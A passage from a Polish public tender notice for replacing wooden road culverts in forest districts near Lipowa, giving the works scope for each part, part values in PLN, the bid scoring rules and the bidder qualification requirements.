wykonanego według rysunku nr 1 w nawierzchni drogi pod odpowiednim skosem oraz spadkiem celem odpowiedniego odprowadzania wód powierzchniowych /długość elementu 5,50m/ - 18 kompletów.<br/>• Wykonanie obsypki zamontowanego wodospustu wraz z zagęszczeniem.<br/>Montaż oraz obsypkę wraz z zagęszczeniem należy wykonać w taki sposób aby dopasować wodospust do nawierzchni drogi aby nie pogorszyć komfortu jazdy. <br/><br/>-DROGA LEŚNA 220/151 LEŚNICTWO ZIELONA<br/>Kody CPV: <br/>45000000-7 Roboty budowlane<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg<br/>• Rozebranie starych wodospustów z jezdni wraz z utylizacją materiałów z rozbiórki.<br/>• Osadzenie nowego wodospustu drewnianego drążonego wykonanego według rysunku nr 1 w nawierzchni drogi pod odpowiednim skosem oraz spadkiem celem odpowiedniego odprowadzania wód powierzchniowych /długość elementu 5,50m/ - 43 kompletów.<br/>• Wykonanie obsypki zamontowanego wodospustu wraz z zagęszczeniem.<br/>Montaż oraz obsypkę wraz z zagęszczeniem należy wykonać w taki sposób aby dopasować wodospust do nawierzchni drogi aby nie pogorszyć komfortu jazdy. <br/><br/>-SZLAK ZRYWKOWY W ODDZIALE 127-128 LEŚNICTWO ZIELONA<br/>Kody CPV: <br/>45000000-7 Roboty budowlane<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg<br/>• Rozebranie starych wodospustów z jezdni wraz z utylizacją materiałów z rozbiórki.<br/>• Osadzenie nowego wodospustu drewnianego drążonego wykonanego według rysunku nr 1 w nawierzchni drogi pod odpowiednim skosem oraz spadkiem celem odpowiedniego odprowadzania wód powierzchniowych /długość elementu 5,50m/ - 14 kompletów.<br/>• Wykonanie obsypki zamontowanego wodospustu wraz z zagęszczeniem.<br/>Montaż oraz obsypkę wraz z zagęszczeniem należy wykonać w taki sposób aby dopasować wodospust do nawierzchni drogi aby nie pogorszyć komfortu jazdy. <br/><br/>-SZLAK ZRYWKOWY W ODDZIALE 132 LEŚNICTWO ZIELONA<br/>Kody CPV: <br/>45000000-7 Roboty budowlane<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg<br/>• Rozebranie starych wodospustów z jezdni wraz z utylizacją materiałów z rozbiórki.<br/>• Osadzenie nowego wodospustu drewnianego drążonego wykonanego według rysunku nr 1 w nawierzchni drogi pod odpowiednim skosem oraz spadkiem celem odpowiedniego odprowadzania wód powierzchniowych /długość elementu 5,50m/ - 11 kompletów.<br/>• Wykonanie obsypki zamontowanego wodospustu wraz z zagęszczeniem.<br/>Montaż oraz obsypkę wraz z zagęszczeniem należy wykonać w taki sposób aby dopasować wodospust do nawierzchni drogi aby nie pogorszyć komfortu jazdy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 115928,73 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">12.1. Oceny ofert będzie dokonywała komisja. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert. Zamawiający poprawi w ofercie omyłki zgodnie z przepisami ustawy Pzp.<br/>	<br/>	12.2. Przy wyborze oferty zamawiający będzie się kierował następującymi kryterium oceny ofert:<br/>1)	Cena - 60 %<br/>2)	Gwarancja i rękojmia – 40 %<br/>12.3. Sposób obliczania punktów dla poszczególnych kryteriów:<br/><br/>1)	W ramach kryterium „Cena” ocena ofert z ostanie dokonana przy zastosowaniu wzoru: <br/><br/> Cn<br/>C = ------------- x 100pkt x 60%<br/> Co <br/><br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej <br/><br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto za wykonanie całego przedmiotu zamówienia) podana w formularzu oferty. W tym kryterium wykonawca może uzyskać maksymalnie 60 punktów. <br/><br/>2)	Kryterium (G) okresu gwarancji– waga 40%<br/><br/>Sposób obliczania punktów dla w/w kryterium: <br/><br/>Gwarancja w miesiącach<br/>Liczba punktów<br/>36 – 47<br/>0<br/>48 – 59<br/>20<br/>60 i wyżej	40<br/><br/>a). Kryterium gwarancji na całość zamówienia będzie rozpatrywane na podstawie zadeklarowanego w formularzu ofertowym okresu gwarancji i rękojmi .<br/>b). Najkrótszy możliwy okres gwarancji i rękojmi wymagany przez zamawiającego to 36 miesięcy liczonych od daty ostatecznego odbioru robót, przy czym bieg gwarancji rozpoczyna się z datą protokołu bezusterkowego odbioru końcowego robót budowlanych. <br/>c). Najdłuższy możliwy okres gwarancji i rękojmi jaki będzie uwzględniany przy ocenie oferty to okres 60 miesięcy.<br/>d). Wykonawca może zaproponować okres gwarancji i rękojmi w pełnych miesiącach tj. 36, 37,....,60 miesięcy. Jeżeli wykonawca wpisze okres gwarancji i rękojmi krótszy niż 36 miesięcy to przygotuje ofertę niezgodnie z SWZ co skutkować będzie odrzuceniem oferty. W przypadku nie wypełnienia w formularzu ofertowym stosownej rubryki zamawiający uzna, że wykonawca deklaruje najkrótszy tj. 36 miesięczny okres gwarancji i rękojmi. <br/><br/>12.4. Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów. Zamawiający obliczy punkty liczbowo z dokładnością do dwóch miejsc po przecinku, zaokrąglając zgodnie z zasadami matematycznymi<br/>12.5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną lub najniższym kosztem, a jeżeli zostały złożone oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3- Leśnictwo Skrzyczne,<br/>Lokalizacja inwestycji: Powiat Żywiecki, Gmina: Lipowa, leśnictwo: Skrzyczne<br/>-DROGA LEŚNA „DO PŁONEGO” LEŚNICTWO SKRZYCZNE<br/>Kody CPV: <br/>45000000-7 Roboty budowlane<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg<br/>• Rozebranie starych wodospustów z jezdni wraz z utylizacją materiałów z rozbiórki.<br/>• Osadzenie nowego wodospustu drewnianego drążonego wykonanego według rysunku nr 1 w nawierzchni drogi pod odpowiednim skosem oraz spadkiem celem odpowiedniego odprowadzania wód powierzchniowych /długość elementu 5,50m/ - 10 kompletów <br/>• Wykonanie obsypki zamontowanego wodospustu wraz z zagęszczeniem.<br/>Montaż oraz obsypkę wraz z zagęszczeniem należy wykonać w taki sposób aby dopasować wodospust do nawierzchni drogi aby nie pogorszyć komfortu jazdy.<br/><br/>-DROGA LEŚNA 220/142 LEŚNICTWO SKRZYCZNE<br/>Kody CPV: <br/>45000000-7 Roboty budowlane<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg<br/>• Rozebranie starych wodospustów z jezdni wraz z utylizacją materiałów z rozbiórki.<br/>• Osadzenie nowego wodospustu drewnianego drążonego wykonanego według rysunku nr 1 w nawierzchni drogi pod odpowiednim skosem oraz spadkiem celem odpowiedniego odprowadzania wód powierzchniowych /długość elementu 5,50m/ - 10 kompletów.<br/>• Wykonanie obsypki zamontowanego wodospustu wraz z zagęszczeniem.<br/>Montaż oraz obsypkę wraz z zagęszczeniem należy wykonać w taki sposób aby dopasować wodospust do nawierzchni drogi aby nie pogorszyć komfortu jazdy.<br/><br/><br/>-DROGA LEŚNA 220/158 LEŚNICTWO SKRZYCZNE<br/>Kody CPV: <br/>45000000-7 Roboty budowlane<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg<br/>• Rozebranie starych wodospustów z jezdni wraz z utylizacją materiałów z rozbiórki.<br/>• Osadzenie nowego wodospustu drewnianego drążonego wykonanego według rysunku nr 1 w nawierzchni drogi pod odpowiednim skosem oraz spadkiem celem odpowiedniego odprowadzania wód powierzchniowych /długość elementu 5,50m/ - 55 kompletów.<br/>• Wykonanie obsypki zamontowanego wodospustu wraz z zagęszczeniem.<br/>Montaż oraz obsypkę wraz z zagęszczeniem należy wykonać w taki sposób aby dopasować wodospust do nawierzchni drogi aby nie pogorszyć komfortu jazdy.<br/><br/>-DROGA LEŚNA 220/326 LEŚNICTWO SKRZYCZNE<br/>Kody CPV: <br/>45000000-7 Roboty budowlane<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg<br/>• Rozebranie starych wodospustów z jezdni wraz z utylizacją materiałów z rozbiórki.<br/>• Osadzenie nowego wodospustu drewnianego drążonego wykonanego według rysunku nr 1 w nawierzchni drogi pod odpowiednim skosem oraz spadkiem celem odpowiedniego odprowadzania wód powierzchniowych /długość elementu 5,50m/ - 115 kompletów.<br/>• Wykonanie obsypki zamontowanego wodospustu wraz z zagęszczeniem.<br/>Montaż oraz obsypkę wraz z zagęszczeniem należy wykonać w taki sposób aby dopasować wodospust do nawierzchni drogi aby nie pogorszyć komfortu jazdy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 129035,14 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">12.1. Oceny ofert będzie dokonywała komisja. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert. Zamawiający poprawi w ofercie omyłki zgodnie z przepisami ustawy Pzp.<br/>	<br/>	12.2. Przy wyborze oferty zamawiający będzie się kierował następującymi kryterium oceny ofert:<br/>1)	Cena - 60 %<br/>2)	Gwarancja i rękojmia – 40 %<br/>12.3. Sposób obliczania punktów dla poszczególnych kryteriów:<br/><br/>1)	W ramach kryterium „Cena” ocena ofert z ostanie dokonana przy zastosowaniu wzoru: <br/><br/> Cn<br/>C = ------------- x 100pkt x 60%<br/> Co <br/><br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej <br/><br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto za wykonanie całego przedmiotu zamówienia) podana w formularzu oferty. W tym kryterium wykonawca może uzyskać maksymalnie 60 punktów. <br/><br/>2)	Kryterium (G) okresu gwarancji– waga 40%<br/><br/>Sposób obliczania punktów dla w/w kryterium: <br/><br/>Gwarancja w miesiącach<br/>Liczba punktów<br/>36 – 47<br/>0<br/>48 – 59<br/>20<br/>60 i wyżej	40<br/><br/>a). Kryterium gwarancji na całość zamówienia będzie rozpatrywane na podstawie zadeklarowanego w formularzu ofertowym okresu gwarancji i rękojmi .<br/>b). Najkrótszy możliwy okres gwarancji i rękojmi wymagany przez zamawiającego to 36 miesięcy liczonych od daty ostatecznego odbioru robót, przy czym bieg gwarancji rozpoczyna się z datą protokołu bezusterkowego odbioru końcowego robót budowlanych. <br/>c). Najdłuższy możliwy okres gwarancji i rękojmi jaki będzie uwzględniany przy ocenie oferty to okres 60 miesięcy.<br/>d). Wykonawca może zaproponować okres gwarancji i rękojmi w pełnych miesiącach tj. 36, 37,....,60 miesięcy. Jeżeli wykonawca wpisze okres gwarancji i rękojmi krótszy niż 36 miesięcy to przygotuje ofertę niezgodnie z SWZ co skutkować będzie odrzuceniem oferty. W przypadku nie wypełnienia w formularzu ofertowym stosownej rubryki zamawiający uzna, że wykonawca deklaruje najkrótszy tj. 36 miesięczny okres gwarancji i rękojmi. <br/><br/>12.4. Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów. Zamawiający obliczy punkty liczbowo z dokładnością do dwóch miejsc po przecinku, zaokrąglając zgodnie z zasadami matematycznymi<br/>12.5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną lub najniższym kosztem, a jeżeli zostały złożone oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4- Leśnictwo Ostre,<br/>Lokalizacja inwestycji: Powiat Żywiecki, Gmina: Lipowa, leśnictwo: Ostre:<br/><br/>-DROGA LEŚNA 220/529 LEŚNICTWO OSTRE<br/>Kody CPV: <br/>45000000-7 Roboty budowlane<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg<br/>• Rozebranie starych wodospustów z jezdni wraz z utylizacją materiałów z rozbiórki.<br/>• Osadzenie nowego wodospustu drewnianego drążonego wykonanego według rysunku nr 1 w nawierzchni drogi pod odpowiednim skosem oraz spadkiem celem odpowiedniego odprowadzania wód powierzchniowych /długość elementu 5,50m/ - 20 kompletów.<br/>• Wykonanie obsypki zamontowanego wodospustu wraz z zagęszczeniem.<br/>Montaż oraz obsypkę wraz z zagęszczeniem należy wykonać w taki sposób aby dopasować wodospust do nawierzchni drogi aby nie pogorszyć komfortu jazdy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 13266,49 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">12.1. Oceny ofert będzie dokonywała komisja. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert. Zamawiający poprawi w ofercie omyłki zgodnie z przepisami ustawy Pzp.<br/>	<br/>	12.2. Przy wyborze oferty zamawiający będzie się kierował następującymi kryterium oceny ofert:<br/>1)	Cena - 60 %<br/>2)	Gwarancja i rękojmia – 40 %<br/>12.3. Sposób obliczania punktów dla poszczególnych kryteriów:<br/><br/>1)	W ramach kryterium „Cena” ocena ofert z ostanie dokonana przy zastosowaniu wzoru: <br/><br/> Cn<br/>C = ------------- x 100pkt x 60%<br/> Co <br/><br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej <br/><br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto za wykonanie całego przedmiotu zamówienia) podana w formularzu oferty. W tym kryterium wykonawca może uzyskać maksymalnie 60 punktów. <br/><br/>2)	Kryterium (G) okresu gwarancji– waga 40%<br/><br/>Sposób obliczania punktów dla w/w kryterium: <br/><br/>Gwarancja w miesiącach<br/>Liczba punktów<br/>36 – 47<br/>0<br/>48 – 59<br/>20<br/>60 i wyżej	40<br/><br/>a). Kryterium gwarancji na całość zamówienia będzie rozpatrywane na podstawie zadeklarowanego w formularzu ofertowym okresu gwarancji i rękojmi .<br/>b). Najkrótszy możliwy okres gwarancji i rękojmi wymagany przez zamawiającego to 36 miesięcy liczonych od daty ostatecznego odbioru robót, przy czym bieg gwarancji rozpoczyna się z datą protokołu bezusterkowego odbioru końcowego robót budowlanych. <br/>c). Najdłuższy możliwy okres gwarancji i rękojmi jaki będzie uwzględniany przy ocenie oferty to okres 60 miesięcy.<br/>d). Wykonawca może zaproponować okres gwarancji i rękojmi w pełnych miesiącach tj. 36, 37,....,60 miesięcy. Jeżeli wykonawca wpisze okres gwarancji i rękojmi krótszy niż 36 miesięcy to przygotuje ofertę niezgodnie z SWZ co skutkować będzie odrzuceniem oferty. W przypadku nie wypełnienia w formularzu ofertowym stosownej rubryki zamawiający uzna, że wykonawca deklaruje najkrótszy tj. 36 miesięczny okres gwarancji i rękojmi. <br/><br/>12.4. Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów. Zamawiający obliczy punkty liczbowo z dokładnością do dwóch miejsc po przecinku, zaokrąglając zgodnie z zasadami matematycznymi<br/>12.5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną lub najniższym kosztem, a jeżeli zostały złożone oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zgodnie z art. 112 ustawy Pzp, o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki dotyczące:<br/>1).	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2).	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3).	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w postępowaniu w odniesieniu do warunku dot. zdolności ekonomicznej. <br/>Warunek ten, w odniesieniu do sytuacji finansowej, zostanie spełniony, jeśli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową nie mniejszą niż: <br/>a)	dla części 1 – 15 000zł	<br/>b)	dla części 2 – 50 000zł	<br/>c)	dla części 3 – 60 000zł	<br/>d)	dla części 4 – 5 000zł	<br/><br/>4).	zdolności technicznej lub zawodowej:<br/>4.1). Warunek ten, w zakresie doświadczenia, zostanie uznany, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, zrealizował co najmniej dwie odrębne roboty budowlane odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia obejmujące swym zakresem wykonanie robót odwodnieniowych wraz z robotami w zakresie nawierzchni dróg o wartości min:<br/>a)	dla Części 1 zamówienia - 15 000,00 zł<br/>b)	dla Części 2 zamówienia - 50 000,00 zł<br/>c)	dla Części 3 zamówienia - 60 000,00 zł<br/>d)	dla Części 4 zamówienia - 5 000,00 zł<br/>Wykonawca może sumować wartości kilku robót o mniejszym zakresie dla uzyskania wymaganej wartości.<br/><br/>-W przypadku robót, których wartość została wyrażona w umowie, w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN, przy zastosowaniu średniego kursu NBP na dzień opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych <br/>(w przypadku robót rozliczanych wyłącznie w walutach innych niż PLN).<br/><br/>4.2). Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia, zostanie uznany, jeżeli Wykonawca wykaże, że dysponuje : dla wszystkich części zamówienia - co najmniej 1(jedną) osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności inżynieryjnej-drogowej lub równoważnej bez ograniczeń niezbędnymi do wykonania zamówienia zgodnie z ustawą z dnia 07.07.1994 Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333 ze zm.) lub odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Zamawiający dopuszcza uprawnienia wydane obywatelom Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, zgodnie z ustawą o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/><br/>5). Jeżeli Wykonawca ubiega się o udzielenie zamówienia na kilka części zamówienia to nie może celem wykazania spełnienia warunków udziału w postępowaniu wskazać tego samego potencjału finansowego w więcej niż jednej Części. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2)	Do oferty każdy wykonawca musi dołączyć aktualne na dzień składania ofert oświadczenie w zakresie wskazanym w załącznikach nr 3,4 do SWZ. Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. <br/>3)	Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia, w postaci:<br/>a) Oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w art. 125 ust. 1 ustawy Pzp w zakresie o którym mowa w art. 108 ust.1 pkt 1-4 i 6<br/>Ustawy Pzp oraz art. 109. Ustawy Pzp; – załącznik nr 5 do SWZ;<br/>b) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Ppz, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów tj. z dnia 22 stycznia 2021 r. (Dz.U. z 2021 r. poz. 275 ze zm.), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 8 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.wykaz robót budowlanych wykonanych (załącznik nr 6 do SWZ), w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane<br/>zostały wykonane należycie. Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane. Jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>2. wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego (załącznik nr 7), w szczególności odpowiedzialnych za kierowanie robotami budowalnymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami,<br/>3. informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej<br/>wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert albo wniosków o 